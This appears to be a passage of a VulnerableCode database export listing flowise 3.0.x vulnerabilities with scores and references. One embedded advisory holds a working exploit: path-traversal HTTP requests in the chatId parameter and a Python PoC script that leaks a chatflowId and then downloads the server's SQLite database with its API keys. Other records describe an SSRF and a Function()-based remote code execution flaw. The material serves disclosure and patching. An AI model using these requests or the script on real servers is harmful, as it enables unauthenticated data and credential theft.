vulnerability VCID-hkfs-v3bp-kbh5
34
vulnerability VCID-j5hh-haj2-qydg
35
vulnerability VCID-jcze-eg2c-mkcf
36
vulnerability VCID-jmps-anck-eqdt
37
vulnerability VCID-k579-xd81-hqdu
38
vulnerability VCID-kpyg-gve3-b3av
39
vulnerability VCID-ksmv-s6c9-t7ap
40
vulnerability VCID-m3j3-4u39-euht
41
vulnerability VCID-pzza-9xq9-a7de
42
vulnerability VCID-qgs1-hazv-67b8
43
vulnerability VCID-qm89-q2ar-uyhy
44
vulnerability VCID-r74e-k86f-7qgb
45
vulnerability VCID-rgmv-6bqh-eqf2
46
vulnerability VCID-s3jg-wce1-fbf3
47
vulnerability VCID-tdm1-91mc-8kgr
48
vulnerability VCID-v1nz-wwsu-qycg
49
vulnerability VCID-v9hg-7pex-g3dp
50
vulnerability VCID-w9yr-5jbp-q7fm
51
vulnerability VCID-xt1d-efw7-g3c6
52
vulnerability VCID-ywgu-76cy-uqe7
53
vulnerability VCID-z1y2-f2ws-8ycb
54
vulnerability VCID-zwna-stj5-3yhm
55
vulnerability VCID-zwz7-byj4-6qan
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6
aliases GHSA-q67q-549q-p849
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g7y6-euhd-jqhh
4
url VCID-n77p-4nu7-2yb4
vulnerability_id VCID-n77p-4nu7-2yb4
summary Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, a Server-Side Request Forgery (SSRF) vulnerability was discovered in the /api/v1/fetch-links endpoint of the Flowise application. This vulnerability allows an attacker to use the Flowise server as a proxy to access internal network web services and explore their link structures. This issue has been patched in version 3.0.6.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-59527
reference_id
reference_type
scores
0
value 0.00218
scoring_system epss
scoring_elements 0.4445
published_at 2026-06-11T12:55:00Z
1
value 0.00218
scoring_system epss
scoring_elements 0.44608
published_at 2026-06-14T12:55:00Z
2
value 0.00218
scoring_system epss
scoring_elements 0.44621
published_at 2026-06-13T12:55:00Z
3
value 0.00218
scoring_system epss
scoring_elements 0.44603
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-59527
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-59527
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-59527
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6
reference_id flowise%403.0.6
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6
3
reference_url https://github.com/advisories/GHSA-hr92-4q35-4j3m
reference_id GHSA-hr92-4q35-4j3m
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hr92-4q35-4j3m
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hr92-4q35-4j3m
reference_id GHSA-hr92-4q35-4j3m
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hr92-4q35-4j3m
5
reference_url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/fetch-links/index.ts#L6-L24
reference_id index.ts#L6-L24
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/
url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/fetch-links/index.ts#L6-L24
6
reference_url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/fetch-links/index.ts#L8-L18
reference_id index.ts#L8-L18
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/
url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/fetch-links/index.ts#L8-L18
7
reference_url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/src/utils.ts#L474-L478
reference_id utils.ts#L474-L478
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/
url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/src/utils.ts#L474-L478
fixed_packages
0
url pkg:npm/flowise@3.0.6
purl pkg:npm/flowise@3.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-39aw-3gc6-bkgb
6
vulnerability VCID-3chx-dj2u-kbab
7
vulnerability VCID-3gp6-wwtd-kkf1
8
vulnerability VCID-488c-vrqu-f7hf
9
vulnerability VCID-5j9e-bcr5-n7bs
10
vulnerability VCID-5pup-kgaf-3ubw
11
vulnerability VCID-67mz-pfy4-ykep
12
vulnerability VCID-6ufs-d346-d7ev
13
vulnerability VCID-71uq-yx2j-cqak
14
vulnerability VCID-9bht-svq8-87b4
15
vulnerability VCID-9rqv-p7rz-5kar
16
vulnerability VCID-a1e4-f5dh-w3a5
17
vulnerability VCID-abyp-yn76-1yfp
18
vulnerability VCID-affy-v76q-fub6
19
vulnerability VCID-aqg8-6us7-uqef
20
vulnerability VCID-b97u-efzx-dffn
21
vulnerability VCID-bkmk-k9mn-ekhx
22
vulnerability VCID-cb6d-4c2v-w7c3
23
vulnerability VCID-cxja-9yxc-k7au
24
vulnerability VCID-d4wa-szeh-43ab
25
vulnerability VCID-dtss-epth-z7fh
26
vulnerability VCID-dzed-27rk-3qav
27
vulnerability VCID-e65e-s5sd-kuhp
28
vulnerability VCID-ejdc-j73x-jydk
29
vulnerability VCID-fu6t-9dk4-jbh9
30
vulnerability VCID-gt6n-beak-33gy
31
vulnerability VCID-gvpx-4wkw-43cz
32
vulnerability VCID-hdej-umwh-kqav
33
vulnerability VCID-hkfs-v3bp-kbh5
34
vulnerability VCID-j5hh-haj2-qydg
35
vulnerability VCID-jcze-eg2c-mkcf
36
vulnerability VCID-jmps-anck-eqdt
37
vulnerability VCID-k579-xd81-hqdu
38
vulnerability VCID-kpyg-gve3-b3av
39
vulnerability VCID-ksmv-s6c9-t7ap
40
vulnerability VCID-m3j3-4u39-euht
41
vulnerability VCID-pzza-9xq9-a7de
42
vulnerability VCID-qgs1-hazv-67b8
43
vulnerability VCID-qm89-q2ar-uyhy
44
vulnerability VCID-r74e-k86f-7qgb
45
vulnerability VCID-rgmv-6bqh-eqf2
46
vulnerability VCID-s3jg-wce1-fbf3
47
vulnerability VCID-tdm1-91mc-8kgr
48
vulnerability VCID-v1nz-wwsu-qycg
49
vulnerability VCID-v9hg-7pex-g3dp
50
vulnerability VCID-w9yr-5jbp-q7fm
51
vulnerability VCID-xt1d-efw7-g3c6
52
vulnerability VCID-ywgu-76cy-uqe7
53
vulnerability VCID-z1y2-f2ws-8ycb
54
vulnerability VCID-zwna-stj5-3yhm
55
vulnerability VCID-zwz7-byj4-6qan
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6
aliases CVE-2025-59527, GHSA-hr92-4q35-4j3m
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-n77p-4nu7-2yb4
5
url VCID-pg5c-6y4s-h3cq
vulnerability_id VCID-pg5c-6y4s-h3cq
summary 
Flowise has an Arbitrary File Read
### Summary
An arbitrary file read vulnerability in the `chatId` parameter supplied to both the `/api/v1/get-upload-file` and `/api/v1/openai-assistants-file/download` endpoints allows unauthenticated users to read unintended files on the local filesystem. In the default Flowise configuration this allows reading of the local sqlite db and subsequent compromise of all database content.

### Details
Both the `/api/v1/get-upload-file` and `/api/v1/openai-assistants-file/download` endpoints accept the `chatId` parameter and pass this to a subsequent call to streamStorageFile().


```
const chatflowId = req.query.chatflowId as string
const chatId = req.query.chatId as string
const fileName = req.query.fileName as string

...
 const fileStream = await streamStorageFile(chatflowId, chatId, fileName, orgId)
```

While streamStorageFile validates that the chatflowId is a UUID and strips traversal sequences from fileName, it performs no validation of chatId.


```
    // Validate chatflowId
    if (!chatflowId || !isValidUUID(chatflowId)) {
        throw new Error('Invalid chatflowId format - must be a valid UUID')
    }

    // Check for path traversal attempts
    if (isPathTraversal(chatflowId)) {
        throw new Error('Invalid path characters detected in chatflowId')
    }
...
    const sanitizedFilename = sanitize(fileName)
...
	const filePath = path.join(getStoragePath(), orgId, chatflowId, chatId, sanitizedFilename)
```

There is validation that the resulting filePath is restricted to the `/root/.flowise/storage` directory.

```
if (!filePath.startsWith(getStoragePath())) throw new Error(`Invalid file path`)
```

However, if the file is not found in the specified path, the orgId value is removed from the filePath and reattempted.

```
        if (fs.existsSync(filePath)) {
            return fs.createReadStream(filePath)
        } else {
            // Fallback: Check if file exists without orgId
            const fallbackPath = path.join(getStoragePath(), chatflowId, chatId, sanitizedFilename)

            if (fs.existsSync(fallbackPath)) {
                // Create directory if it doesn't exist
                const dir = path.dirname(filePath)
                if (!fs.existsSync(dir)) {
                    fs.mkdirSync(dir, { recursive: true })
                }

                // Copy file to correct location with orgId
                fs.copyFileSync(fallbackPath, filePath)

                // Delete the old file
                fs.unlinkSync(fallbackPath)

                // Clean up empty directories recursively
                _cleanEmptyLocalFolders(path.join(getStoragePath(), chatflowId, chatId))

                return fs.createReadStream(filePath)

```

As this fallback path is read after the `/root/.flowise/storage` check, this allows an additional level of traversal up to `/root/.flowise/`. As a result, this  allows reading of `/root/.flowise/database.sqlite`, which contains all database content in the default Flowise configuration.

REQUEST
```
GET /api/v1/get-upload-file?chatflowId=188903b1-d06d-4f93-9415-400015b87146&chatId=../.././&fileName=database.sqlite HTTP/1.1
Host: 127.0.0.1:3000

```

RESPONSE
```
HTTP/1.1 200 OK
Vary: Origin
Access-Control-Allow-Credentials: true
Content-Disposition: attachment; filename="database.sqlite"
Date: Tue, 22 Jul 2025 06:43:51 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 385024

SQLite format 3���@  ���6���^���A������Õ�������������������������������������������������6�.r¢ö�Ú����ZûìñæàÚÛ	�Ïl–
Í‚S=*''���������������������������������������������������������������������������������������������������������������������������������������������;,O)�indexsqlite_autoindex_docume
...
```

Similarly, for `/api/v1/openai-assistants-file/download`:
REQUEST
```
POST /api/v1/openai-assistants-file/download HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Content-Length: 100

{"chatflowId":"c5c63474-e757-4fca-a504-d54e84c309bb","chatId":"/../..","fileName":"database.sqlite"}
```
RESPONSE
```
HTTP/1.1 200 OK
Vary: Origin
Access-Control-Allow-Credentials: true
Content-Disposition: attachment; filename="database.sqlite"
Date: Tue, 22 Jul 2025 08:55:25 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 385024

SQLite format 3���@  ���6���^���A������Õ�������������������������������������������������6�.r¢ö�Ú����ZûìñæàÚÛ	
...
```

This includes all API keys used by the application (apiKey table), which can be used to gain administrative access.

As the fallback logic attempts to move the file to the initially checked directory, this results in the server permanently being unable to make new read or write operations until the file is moved and the server is restarted.

Interaction with these endpoints requires knowledge of a valid `chatflowId`. As a UUID, this is inherently unguessable. However, the `/api/v1/vector/upsert/` endpoint can be used without a chatflowId, defaulting to the first ID available. This endpoint returns a verbose error when receiving a malformed filename, revealing the full internal file path and the associated `chatflowId`.


REQUEST
```
POST /api/v1/vector/upsert/ HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 172
Connection: keep-alive

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="?"
Content-Type: text/plain


------WebKitFormBoundary7MA4YWxkTrZu0gW--
```
RESPONSE
```
HTTP/1.1 500 Internal Server Error
Vary: Origin
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: 240
ETag: W/"f0-khSyqlT3NYLMJGjdchTl6Iwqe4U"
Date: Tue, 22 Jul 2025 08:14:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"statusCode":500,"success":false,"message":"Error: vectorsService.upsertVector - EISDIR: illegal operation on a directory, open '/root/.flowise/storage/07b5d2bd-9b5c-4de3-b234-4fe4357051c9/188903b1-d06d-4f93-9415-400015b87146'","stack":{}}
```
In this case the UUID is revealed as `188903b1-d06d-4f93-9415-400015b87146`, which can then be used to exploit the file read vulnerability.

### PoC

Run Flowise:
```
docker run --rm  -p 3000:3000 flowiseai/flowise
```
Complete install & create a Chatflow:
<img width="575" height="299" alt="image" src="https://github.com/user-attachments/assets/1a34e809-b9b3-48a1-93b4-8dafccf87e3b" />

Save this script to `read.py`:
```
import argparse
import re
import requests

def read_file(url, file_path, proxy):
    base_url = url
    proxies = {'http': proxy, 'https': proxy} if proxy else None

    print(f">> starting exploit against {base_url}")
    if proxy:
        print(f">> using proxy: {proxy}")

    try:
        print("[*] step 1: leaking chatflowid")
        initial_headers = {}
        files = {'files': ('?', 'asdf', 'text/plain')}
        response = requests.post(f"{base_url}/api/v1/vector/upsert/", files=files, headers=initial_headers, timeout=10, proxies=proxies)
        chatflow_id_matches = re.findall(r'([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})', response.json().get("message", ""))
        if len(chatflow_id_matches) < 2:
            print("[-] failed to leak chatflowid.")
            return
        chatflow_id = chatflow_id_matches[1]
        print(f"[+] got chatflowid: {chatflow_id}")

        print(f"[*] step 2: reading file: {file_path}")
        internal_headers = {'x-request-from': 'internal'}
        params = {'chatflowId': chatflow_id, 'chatId': '/../../', 'fileName': file_path}
        response = requests.get(f"{base_url}/api/v1/get-upload-file", params=params, headers=internal_headers, timeout=10, proxies=proxies)
        
        if response.status_code != 200:
            print(f"[-] failed to read file (status: {response.status_code}).")
            print(response.text)
            return
        
        file_content = response.text
        print(f"[+] successfully read file ({len(response.content)} bytes).")
        print("\n--- file content ---")
        print(file_content)
        print("--------------------\n")

    except requests.exceptions.RequestException as e:
        print(f"\n[-] an unexpected error occurred: {e}")
    except Exception as e:
        print(f"\n[-] an unexpected error occurred: {e}")
        return

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Read arbitrary files")
    parser.add_argument("-u", "--url", type=str, required=True, help="target base url (e.g., http://127.0.0.1:3000)")
    parser.add_argument("-f", "--file", type=str, required=True, help="path of the file to read on the server (e.g., database.sqlite)")
    parser.add_argument("-x", "--proxy", type=str, help="proxy to use (e.g., http://127.0.0.1:8080)")

    args = parser.parse_args()
    read_file(args.url, args.file, args.proxy)
```

Run the script against `http://127.0.0.1:3000`:
```
python3 read.py -u http://127.0.0.1:3000 -f database.sqlite
>> starting exploit against http://127.0.0.1:3000
[*] step 1: leaking chatflowid
[+] got chatflowid: c5c63474-e757-4fca-a504-d54e84c309bb
[*] step 2: reading file: database.sqlite
[+] successfully read file (385024 bytes).

--- file content ---
ÕÇêS=*'';,O)indexsqlite_autoindex...

```


### Impact

This allows any unauthenticated user to extract all database content from a default installation of Flowise. This includes API keys, which can be used to gain administrative access.
references
0
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-99pg-hqvx-r4gf
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-99pg-hqvx-r4gf
1
reference_url https://github.com/advisories/GHSA-99pg-hqvx-r4gf
reference_id GHSA-99pg-hqvx-r4gf
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-99pg-hqvx-r4gf
fixed_packages
0
url pkg:npm/flowise@3.0.6
purl pkg:npm/flowise@3.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-39aw-3gc6-bkgb
6
vulnerability VCID-3chx-dj2u-kbab
7
vulnerability VCID-3gp6-wwtd-kkf1
8
vulnerability VCID-488c-vrqu-f7hf
9
vulnerability VCID-5j9e-bcr5-n7bs
10
vulnerability VCID-5pup-kgaf-3ubw
11
vulnerability VCID-67mz-pfy4-ykep
12
vulnerability VCID-6ufs-d346-d7ev
13
vulnerability VCID-71uq-yx2j-cqak
14
vulnerability VCID-9bht-svq8-87b4
15
vulnerability VCID-9rqv-p7rz-5kar
16
vulnerability VCID-a1e4-f5dh-w3a5
17
vulnerability VCID-abyp-yn76-1yfp
18
vulnerability VCID-affy-v76q-fub6
19
vulnerability VCID-aqg8-6us7-uqef
20
vulnerability VCID-b97u-efzx-dffn
21
vulnerability VCID-bkmk-k9mn-ekhx
22
vulnerability VCID-cb6d-4c2v-w7c3
23
vulnerability VCID-cxja-9yxc-k7au
24
vulnerability VCID-d4wa-szeh-43ab
25
vulnerability VCID-dtss-epth-z7fh
26
vulnerability VCID-dzed-27rk-3qav
27
vulnerability VCID-e65e-s5sd-kuhp
28
vulnerability VCID-ejdc-j73x-jydk
29
vulnerability VCID-fu6t-9dk4-jbh9
30
vulnerability VCID-gt6n-beak-33gy
31
vulnerability VCID-gvpx-4wkw-43cz
32
vulnerability VCID-hdej-umwh-kqav
33
vulnerability VCID-hkfs-v3bp-kbh5
34
vulnerability VCID-j5hh-haj2-qydg
35
vulnerability VCID-jcze-eg2c-mkcf
36
vulnerability VCID-jmps-anck-eqdt
37
vulnerability VCID-k579-xd81-hqdu
38
vulnerability VCID-kpyg-gve3-b3av
39
vulnerability VCID-ksmv-s6c9-t7ap
40
vulnerability VCID-m3j3-4u39-euht
41
vulnerability VCID-pzza-9xq9-a7de
42
vulnerability VCID-qgs1-hazv-67b8
43
vulnerability VCID-qm89-q2ar-uyhy
44
vulnerability VCID-r74e-k86f-7qgb
45
vulnerability VCID-rgmv-6bqh-eqf2
46
vulnerability VCID-s3jg-wce1-fbf3
47
vulnerability VCID-tdm1-91mc-8kgr
48
vulnerability VCID-v1nz-wwsu-qycg
49
vulnerability VCID-v9hg-7pex-g3dp
50
vulnerability VCID-w9yr-5jbp-q7fm
51
vulnerability VCID-xt1d-efw7-g3c6
52
vulnerability VCID-ywgu-76cy-uqe7
53
vulnerability VCID-z1y2-f2ws-8ycb
54
vulnerability VCID-zwna-stj5-3yhm
55
vulnerability VCID-zwz7-byj4-6qan
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6
aliases GHSA-99pg-hqvx-r4gf
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pg5c-6y4s-h3cq
6
url VCID-wt2v-e5sa-n3g8
vulnerability_id VCID-wt2v-e5sa-n3g8
summary Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. This issue has been patched in version 3.0.6.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-59528
reference_id
reference_type
scores
0
value 0.85265
scoring_system epss
scoring_elements 0.99382
published_at 2026-06-13T12:55:00Z
1
value 0.85265
scoring_system epss
scoring_elements 0.99379
published_at 2026-06-11T12:55:00Z
2
value 0.85265
scoring_system epss
scoring_elements 0.99381
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-59528
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-59528
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-59528
2
reference_url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L132
reference_id CustomMCP.ts#L132
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/
url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L132
3
reference_url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L220
reference_id CustomMCP.ts#L220
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/
url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L220
4
reference_url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L262-L270
reference_id CustomMCP.ts#L262-L270
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/
url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L262-L270
5
reference_url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52440.py
reference_id CVE-2025-59528
reference_type exploit
scores
url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52440.py
6
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6
reference_id flowise%403.0.6
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6
7
reference_url https://github.com/advisories/GHSA-3gcm-f6qx-ff7p
reference_id GHSA-3gcm-f6qx-ff7p
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3gcm-f6qx-ff7p
8
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p
reference_id GHSA-3gcm-f6qx-ff7p
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p
9
reference_url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/routes/node-load-methods/index.ts#L5
reference_id index.ts#L5
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/
url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/routes/node-load-methods/index.ts#L5
10
reference_url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/nodes/index.ts#L57-L78
reference_id index.ts#L57-L78
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/
url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/nodes/index.ts#L57-L78
11
reference_url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/nodes/index.ts#L91-L94
reference_id index.ts#L91-L94
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/
url https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/nodes/index.ts#L91-L94
fixed_packages
0
url pkg:npm/flowise@3.0.6
purl pkg:npm/flowise@3.0.6
is_vulnerable true
affected_by_vulnerabilities
0
